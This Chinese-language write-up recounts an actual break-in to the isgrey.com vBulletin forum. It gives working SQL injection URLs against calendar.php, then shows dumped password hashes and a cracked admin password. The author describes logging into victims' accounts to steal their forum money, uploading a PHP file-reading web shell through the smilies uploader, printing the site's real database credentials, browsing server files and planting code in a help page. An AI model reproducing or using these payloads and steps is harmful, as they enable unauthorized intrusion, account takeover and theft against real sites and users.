入侵灰色轨迹论坛
灰色轨迹:一个人气很不错的黑客技术站点,也是当年培育我成长得地方。一日,闲来无事便想测试一下php脚本的安全性。所以就看了看灰色轨迹的VBB论坛。
因为是由于灰色论坛启发的学习之路,所以偶得先看看灰色论坛用得是版本的vbb了―――vBulletin Forum 2.3.0。 恩,就是这个,立刻找到了原文件看起来。一来就打开看到了日历文件这里有这么一段:
calendar。php,发现问题!
-------- 相关代码如下 ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid =
$eventid");
if ($eventinfo[userid] != $bbuserinfo[userid])
{
$permissions=getpermissions();
if ($permissions[canpublicedit]!=1) {
show_nopermission();
}
OK。我们可以看到eventid没有过滤。可以进行SQL INJECTION注射攻击。所以下面我们来构造句子进行注射。PHP+MYSQL的注射攻击条件比较难。由于MYSQL本身功能问题。限制了不少有用的注射方法。所以我们要完成注射就要找别的方法了。
如果论坛使用的MySQL版本在4.00以上,就可以进行UNION攻击。至于如何察看MYSQL版本就不多说了。利用注射就可以做到得。
攻击演示句子:
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
此时query_first函数将只返回第一行的查询结果,如果存在漏洞。我们将看到MYSQL得版本和MYSQL得用户如果我们构造好。就可以得到数据库得任何内容。当然包括USER表中的密码
二.论坛攻击与测试过程
开始对灰色轨迹论坛进行测试:
http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
我们看到了结果:
4.0.2-alpha-nt -----------------出现在标题栏--------就是我们的user()函数
isgreyvbb@localhost ------------------------------事件内容里-----我们的version()函数
再来
http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
结果:
------------------------------------------------
看起来中新软件-灰色轨迹安全咨讯站技术讨论区数据库发生了一些微小的错误
请按浏览器的 刷新 按钮重试。
一封 E-Mail 已经发送给 技术支持信箱, 如果问题仍然存在,你也可以直接联系。
对给你造成的不便我们深表歉意。
―――――――――――――――――――――――――――
再来:
http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,-0-0',now(),database()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
vbb----------数据库名字
http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,-0-0',user(),md5(123456)%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate10adc3949ba59abbe56e057f20f883e
哈哈........随便测试了几个函数.都成功了.但是我们怎么来取得密码呢?
*******************************************************************************
下面来构造取密码的句子:
恩,我们用UNION.UNION来看看。两张表字段要相等,类型要相似,满足条件非常简单。
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
MySQL said:
The used SELECT statements have a different number of columns
恩,字段不相等,错误
********************************************************************************************
本地测试UNION句子:
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)allowsmilies public userid eventdate event subject Edit Delete 1 1 1 2000-00-01 welcomesay 6a204bd89f3c8348afd5c77c717a097a
恩。返回成功了,我们看到了想要得东西.密码.这里感谢一下兄弟小竹.注入过程以及构造过程中.他给了很大启发以及帮助.!~我们的句子就要这样构造就行了。
回到灰色论坛来:
*******************************************************************************
http://zerolu.vicp.net/calendar.php?s=&action=edit&eventid=11%20UNION%20(SELECT%201,0,2,-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate
哈哈!!!!!!!!!!成功.可以显示任何人密码了.哈哈!~测试成功!~
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20UNION%20(SELECT%201,0,12695,-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate
哈哈.蓝骑士的密码拿来了.我们登陆看看.哼!~欢迎你回来:蓝骑士...............哈哈...........成功!~然后就进了银行.将他仅有的192个金币转走了.嘻!~接下来我们来取沙子得密码,先查他ID:
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20UNION%20(SELECT%201,0,12695,-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate
这样就返回了ID号:6565-----------沙子得ID
查查SANDFLEE的USERID多少,哇,单引号也可以使用呀。
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20UNION%20(SELECT%201,0,12695,-01-01',username,password%20FROM%20user%20WHERE%20userid=6565)%20order%20by%20eventdate
哈哈,USERID=6565的用户和密码出来了.!然后当然是登陆.偷他钱了.哼 ---------------欢迎你回来:Sandflee
用户名: Sandflee
总资产: 1582414
现金: 1
存款: 1582413
恩,先拿他100万了.给他留点
http://bbs.isgrey.com/showgroups.php 恩.来察看了一下管理员情况.有三个哦
本来是32位密码.去掉前后8位是16位的了.
sandflee --------------6565 d82f53035a0311f0
pskey -------13384 e429cd6be979bb0a
IpFilterImD ----9914 6a31ceb936eeef23
进入后台:
29175183 sandflee ----------破出的密码.呵呵.幸好是数字哦
来到表情符号上传那就可以开始上传PHP文件了.
另外要备份数据库也很简单.都是现成提供好的功能了.呵呵..........
然后我们写个小程序.<?readfile($heiye)?>
heiye.php
http://bbs.isgrey.com/images/smilies/heiye.php?a=..\..\admin\config.php
(呵呵..........MYSQL的用户和密码也来了.网页是不显示的.空白的.察看源代码就可以看到了)
/////////////////////////////////////////////////////////////
// Please note that if you get any errors when connecting, //
// that you will need to email your host as we cannot tell //
// you what your specific values are supposed to be //
/////////////////////////////////////////////////////////////
// type of database running
// (only mysql is supported at the moment)
$dbservertype='mysql'
// hostname or ip of server
$servername='localhost'
// username and password to log onto db server
$dbusername='isgreyvbb'
$dbpassword='bbq139'
// name of database
$dbname='vbb'
// technical email address - any error messages will be emailed here
$technicalemail='webmaster@isgrey.com'
// use persistant connections to the database
// 0 = don't use
// 1 = use
$usepconnect=0;
?>824
OK,看见MYSQL密码了,这里他限制外部连接了............呵呵...........
后来写了些小脚本上去,因为他禁止了调用CMD。只能利用PHP内部函数了.
http://bbs.isgrey.com/admin/temp3.php?c=dir&f=d:\
bbs mysql RECYCLER sandflee System Volume Information temp
http://bbs.isgrey.com/admin/temp3.php?c=dir&f=c:\Zxfirewall\
. .. config.ini drivers install install.bat InterfaceDLL.dll IPFControlService.exe
IPFMonitor.exe password.key systemfilters.txt uninstall.bat
http://bbs.isgrey.com/admin/temp3.php?c=file&f=c:\Zxfirewall\config.ini
server=127.0.0.1 18
http://bbs.isgrey.com/admin/temp3.php?c=file&f=c:\Zxfirewall\install.bat
ipfcontrolservice -i ipfcontrolservice -s 44
http://bbs.isgrey.com/admin/temp3.php?c=file&f=c:\Zxfirewall\systemfilters.txt
; For test only
允许自己用ping命令探测其他机器 Filter { name = 允许自己用ping命令探测其他机器
description = 防止别人用ping命令探测 protocol = ICMP ICMP_Type = 0 receive pass }
防止别人用ping命令探测 Filter { name = 防止别人用ping命令探测 description = 防止别人用ping命令
探测 protocol = ICMP icmp_type = 8 receive } HTTP protocol filter { name = 禁止HTTP协议(80端口) description = 禁止HTTP协议(80端口) protocol = TCP tcp_remoteport = 80 send receive } 513 恩..........看了些文件.没意思了.现在就能改论坛首页了.不过我们的目的是检测.没有破坏的意思.所以就没有做了.毕竟对灰色有感情。
后来就找了个帮助页,插进了我们的代码,走人了.由于之前有点感情.所以没给他改页.呵呵.
三.总结:
PHP注入的确比ASP难得多。不过,多去研究发现,很多问题还是存在的。比ASP注入攻击等有意思多了。希望这篇PHP注入的文章能带给大家一些新的攻击注入思路。